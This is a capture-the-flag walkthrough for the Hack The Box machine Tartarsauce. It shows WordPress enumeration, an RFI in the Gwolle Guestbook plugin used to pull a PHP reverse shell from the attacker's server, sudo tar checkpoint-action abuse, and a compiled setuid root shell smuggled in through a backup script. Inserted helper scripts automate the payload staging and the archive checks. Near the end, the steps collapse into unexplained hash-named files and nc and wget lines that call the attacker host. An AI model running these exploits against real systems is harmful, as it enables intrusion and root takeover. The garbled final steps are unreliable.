
This Hack The Box Tartarsauce walkthrough covers how to get root-level access on the Tartarsauce box. One of my favorite boxes is Active, which is good for strengthening your Windows privilege escalation skills.

Here is what you will learn:

  • How to exploit WordPress
  • How to exploit RFI Vulnerabilities
  • Exploiting system scripts
  • Linux Privilege Escalation

Initial Enumeration

An nmap scan of 10.10.10.88 reveals a single open port on the Tartarsauce box: HTTP on TCP 80.

Web Enumeration

Web enumeration is naturally the next step, since we have just discovered a running web service on TCP 80. I start with gobuster:

gobuster dir -u http://10.10.10.88 -w ~/seclists/Discovery/Web-Content/common.txt -v | grep Found
gobuster turns up a /webservices directory; the site root itself is just a picture of a bottle of tartar sauce.

Then I run gobuster again against the newly found directory to dig further.

gobuster dir -u http://10.10.10.88/webservices -w ~/seclists/Discovery/Web-Content/common.txt -v | grep Found

How to Exploit WordPress

One thing we do find is that the web server hosts a WordPress installation under /webservices/wp.

Enumerate using wpscan

A default wpscan run is too limited in this scenario and finds no plugins at all. There is a clue in its output, though: wpscan reports that it failed to enumerate plugins using passive methods, so the next scan needs to use aggressive plugin detection.

wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p,u --plugins-detection aggressive

The aggressive scan turns up the Gwolle Guestbook plugin (gwolle-gb), which has a known remote file inclusion. The exploit-db entry describes it as follows:

HTTP GET parameter "abspath" is not being properly sanitized before being used in the PHP require() function. A remote attacker can include a file named 'wp-load.php' from an arbitrary remote server and execute its content on the vulnerable web server. In order to do so, the attacker needs to place a malicious 'wp-load.php' file into his server's document root and include the server's URL in the request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

https://www.exploit-db.com/exploits/38861

Against Tartarsauce the request becomes (keep the trailing slash: it is harmless if the plugin adds its own path separator and required if it simply concatenates the file name onto abspath):

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.17/

Copy the PHP reverse shell that ships with Kali:

cp /usr/share/webshells/php/php-reverse-shell.php ~/.

Rename it to wp-load.php, the file name the plugin will request:

cp php-reverse-shell.php wp-load.php

Edit the $ip and $port values in the shell to your Kali machine's address and the port you want to receive the shell on, such as 1234. Then serve the file over HTTP from the attacker host (the abspath URL points at that server's document root) and start a listener on the chosen port before sending the request. Remote require() of an http:// URL only works when PHP's allow_url_include setting is enabled, which is worth checking if this technique fails elsewhere.
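The staging steps above, as an added example that is not part of the original post: it copies the reverse shell, patches the callback host and port in place, verifies the patch took, and prints the serve/listen/fire commands rather than running them. It assumes GNU sed (as on Kali), that php-reverse-shell.php carries pentestmonkey's `$ip = '...';` and `$port = ...;` lines, and an HTTP_PORT of 80; the target, 10.10.14.17 and port 1234 are the post's own values. If Kali's copy of the shell is not installed, a constructed stand-in with the same two lines is used so the patching logic can still be exercised.

```shell
#!/bin/sh
# Stage the wp-load.php payload for the Gwolle Guestbook abspath inclusion.
# Added example, not from the original post. Assumes GNU sed (Kali) and that
# php-reverse-shell.php carries pentestmonkey's "$ip = '...';" and
# "$port = ...;" lines. HTTP_PORT and WEBROOT are assumptions; the target,
# LHOST and LPORT are the values used in the post.

TARGET="http://10.10.10.88/webservices/wp"
LHOST="10.10.14.17"
LPORT="1234"                              # reverse shell callback port
HTTP_PORT="${HTTP_PORT:-80}"              # port the payload is served from
WEBROOT="${WEBROOT:-$(mktemp -d)}"        # attacker web root holding wp-load.php

# Constructed stand-in with the same two lines the real shell has; used only
# when Kali's copy is not installed (e.g. when running this somewhere else).
make_sample_shell() {
  cat > "$1" <<'EOF'
<?php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
}

# Copy the reverse shell to $2/wp-load.php with the callback host/port patched in.
stage_wp_load() {
  out="$2/wp-load.php"
  mkdir -p "$2"
  cp "$1" "$out"
  sed -i "s|^[$]ip = '[^']*';|\$ip = '$LHOST';|" "$out"
  sed -i "s|^[$]port = [0-9]*;|\$port = $LPORT;|" "$out"
  echo "$out"
}

# Succeeds only if the staged file really calls back to LHOST:LPORT.
check_staged() {
  grep -qF "\$ip = '$LHOST';" "$1" && grep -qF "\$port = $LPORT;" "$1"
}

# The request that makes the target require() http://LHOST:HTTP_PORT/wp-load.php.
# Trailing slash: harmless if the plugin adds a separator, required if it just
# concatenates the file name onto abspath.
rfi_url() {
  echo "$TARGET/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$LHOST:$HTTP_PORT/"
}

SRC=/usr/share/webshells/php/php-reverse-shell.php
if [ ! -f "$SRC" ]; then
  mkdir -p "$WEBROOT"
  SRC="$WEBROOT/php-reverse-shell.php"
  make_sample_shell "$SRC"
fi
STAGED=$(stage_wp_load "$SRC" "$WEBROOT")
check_staged "$STAGED" || { echo "patching failed" >&2; exit 1; }

# Manual steps (printed, not run here): serve, listen, then fire the request.
echo "staged: $STAGED"
echo "serve:  (cd $WEBROOT && python3 -m http.server $HTTP_PORT)"
echo "listen: nc -lvnp $LPORT"
echo "fire:   curl -s '$(rfi_url)'"
```

Serving on port 80 needs root on the attacker side; if you serve on 8000 instead, set HTTP_PORT=8000 so the abspath URL carries the port, since the target fetches whatever URL you hand it.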

Check our user’s sudo privileges

sudo -l

The output shows that the www-data user can run /bin/tar through sudo as the user onuma without a password. Nice!

Abuse tar for priv escalation

Some Googling leads me to an article with a few suggestions for abusing common Linux commands to escalate privileges. The one that applies here is GNU tar's checkpoint feature: --checkpoint-action=exec=COMMAND runs COMMAND through the shell each time tar reaches a checkpoint, and --checkpoint=1 makes the first checkpoint happen after the first record, so running tar through sudo as onuma hands us a shell as onuma.

Create an empty file named testfile first; what it contains does not matter, tar just needs something to archive.

sudo -u onuma /bin/tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

The option has to be spelled exactly --checkpoint-action=exec=/bin/bash; the article I followed has a typo in it, and tar rejects any other spelling.

The shell that tar spawns runs as onuma. Upgrade it to a proper TTY:

python -c "import pty; pty.spawn('/bin/bash')"
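To see the checkpoint trick fire without sudo or a target, here is an added example that is not part of the original post: it runs the same tar invocation as the current user, with the exec action set to drop a marker file instead of spawning bash, and reports whether the action ran. It assumes GNU tar (the checkpoint options are a GNU extension) and reports "skipped" on anything else.

```shell
#!/bin/sh
# Local demonstration of GNU tar's --checkpoint-action=exec running a command
# while an archive is being written. Added example, not from the original
# post; runs as the current user, so no sudo is involved. On Tartarsauce the
# same invocation is prefixed with "sudo -u onuma" and exec's /bin/bash.

# Run a throwaway command through a tar checkpoint and report whether it fired.
# Prints "ok", "failed", or "skipped" (non-GNU tar has no checkpoint actions).
tar_checkpoint_exec() {
  tar --version 2>/dev/null | grep -q 'GNU tar' || { echo skipped; return 0; }
  work=$(mktemp -d)
  : > "$work/testfile"               # contents irrelevant; tar needs a member
  marker="$work/checkpoint-ran"
  # --checkpoint=1: checkpoint after every record written
  # --checkpoint-action=exec=CMD: CMD is run via /bin/sh -c at each checkpoint
  ( cd "$work" && tar cf /dev/null testfile --checkpoint=1 \
        --checkpoint-action=exec="touch $marker" ) >/dev/null 2>&1
  if [ -e "$marker" ]; then echo ok; else echo failed; fi
  rm -rf "$work"
}

# The shell-spawning form used on the box (shown, not executed here):
#   sudo -u onuma /bin/tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar_checkpoint_exec
```

The archive goes to /dev/null because the output is irrelevant; what matters is that tar reaches a checkpoint, and even a single empty member produces one record, which is enough.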

Compile Setuid File Exploit

The objective here is to get the backuperer script, which runs as root, to extract a tar archive that we place in the web server's directory.

First compile a small SUID binary for the target's 32-bit architecture. Once it is a root-owned setuid file on the target, running it spawns a shell with root privileges.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs with euid 0 thanks to the setuid bit. Make the real uid root as well,
 * so the spawned shell keeps its privileges, then replace this process with sh. */
int main(void)
{
    char *argv[] = { "/bin/sh", NULL };

    if (setreuid(0, 0) != 0) {
        perror("setreuid");     /* not root-owned setuid, or bit stripped */
        return 1;
    }
    execve("/bin/sh", argv, NULL);
    perror("execve");           /* only reached if the exec failed */
    return 1;
}

Now compile setuid.c as a 32-bit binary and set its permissions. Tar records the mode bits, setuid and setgid included, so they carry over to the target when root extracts the archive. If the 32-bit build fails for lack of 32-bit headers and libraries, install the multilib package first.

apt-get install gcc-multilib
gcc -m32 setuid.c -o setuid
chmod 6555 setuid

Now tar up the directory, running tar as root (or passing --owner=0 --group=0) so the archived member is recorded as owned by root; a setuid bit is only useful if the file belongs to root after extraction.

root@kali:~/tartarsauce# tar -zcvf setuid.tar.gz var/
var/
var/www/
var/www/html/
var/www/html/setuid
root@kali:~/tartarsauce# ls -al
total 32
drwxr-xr-x  3 root root  4096 Nov 24 17:34 .
drwxr-xr-x 33 root root  4096 Nov 24 17:33 ..
-r-xr-xr-x  1 root root 15532 Nov 24 17:33 setuid
-rw-r--r--  1 root root  2767 Nov 24 17:35 setuid.tar.gz
drwxr-xr-x  3 root root  4096 Nov 24 17:34 var

Because the archive records root ownership and the 6555 mode, extracting it as root recreates setuid as a root-owned SUID binary, and the backuperer script does exactly that when it unpacks the tar. Running the extracted binary then gives a root shell. The setuid bit only survives extraction because tar is running as root and keeping the stored owner and permissions, which is GNU tar's default behaviour for root.
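Before dropping the archive on the target it is worth confirming that it really records uid 0 and mode 6555, since a member owned by your Kali user would extract as a harmless non-root file. Here is an added example, not part of the original post, that builds the var/www/html/setuid tree, packs it with root ownership forced through tar's --owner/--group options (so it works even when you are not root on the attacker machine), and checks the listing. It assumes GNU tar; if no compiled setuid binary is in the current directory it packs a constructed placeholder script so the ownership and mode check can still run.

```shell
#!/bin/sh
# Build setuid.tar.gz for the backuperer script and verify the archived member
# is recorded as uid 0 / gid 0 with mode 6555. Added example, not from the
# original post. Assumes GNU tar. A compiled ./setuid from the post's gcc
# step is used when present; otherwise a constructed placeholder stands in.

# Stage $1 as var/www/html/setuid under $2, mode 6555, and pack it with root
# ownership forced. Prints the archive path.
pack_setuid() {
  bin="$1"; stage="$2"
  mkdir -p "$stage/var/www/html"
  cp "$bin" "$stage/var/www/html/setuid"
  chmod 6555 "$stage/var/www/html/setuid"
  # --owner=0 --group=0 records root as the member owner regardless of who runs tar
  ( cd "$stage" && tar --owner=0 --group=0 -zcf setuid.tar.gz var/ )
  echo "$stage/setuid.tar.gz"
}

# Print "ok" when the archived member lists as -r-sr-sr-x owned by 0/0.
# --numeric-owner keeps the listing as raw ids instead of resolved names.
verify_archive() {
  line=$(tar --numeric-owner -tzvf "$1" var/www/html/setuid 2>/dev/null)
  case "$line" in
    "-r-sr-sr-x 0/0 "*) echo ok ;;
    *) echo "bad: $line" ;;
  esac
}

STAGE=$(mktemp -d)
if [ -x ./setuid ]; then
  BIN=./setuid
else
  BIN="$STAGE/setuid.placeholder"          # constructed stand-in for the binary
  printf '#!/bin/sh\nid\n' > "$BIN"
fi
ARCHIVE=$(pack_setuid "$BIN" "$STAGE")
echo "archive: $ARCHIVE"
verify_archive "$ARCHIVE"
```

The extraction side is the other half of the check: only tar running as root keeps the stored owner and the setuid bit, so on the target confirm with ls -l that the extracted file shows up as -r-sr-sr-x root root before relying on it.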

.5152194081bd913ef3b1012d5e89327c620a8aa0
nc 10.10.10.88 4321 > .72afa666dfe1689ad54a752f3f1be94763d4e162

wget http://10.10.14.17:8000/.e507f25bde8bac0f8c5b95f3de9b97dcabad4616

From there the SUID binary executes and we have access to the root.txt file found in the root user’s home directory.
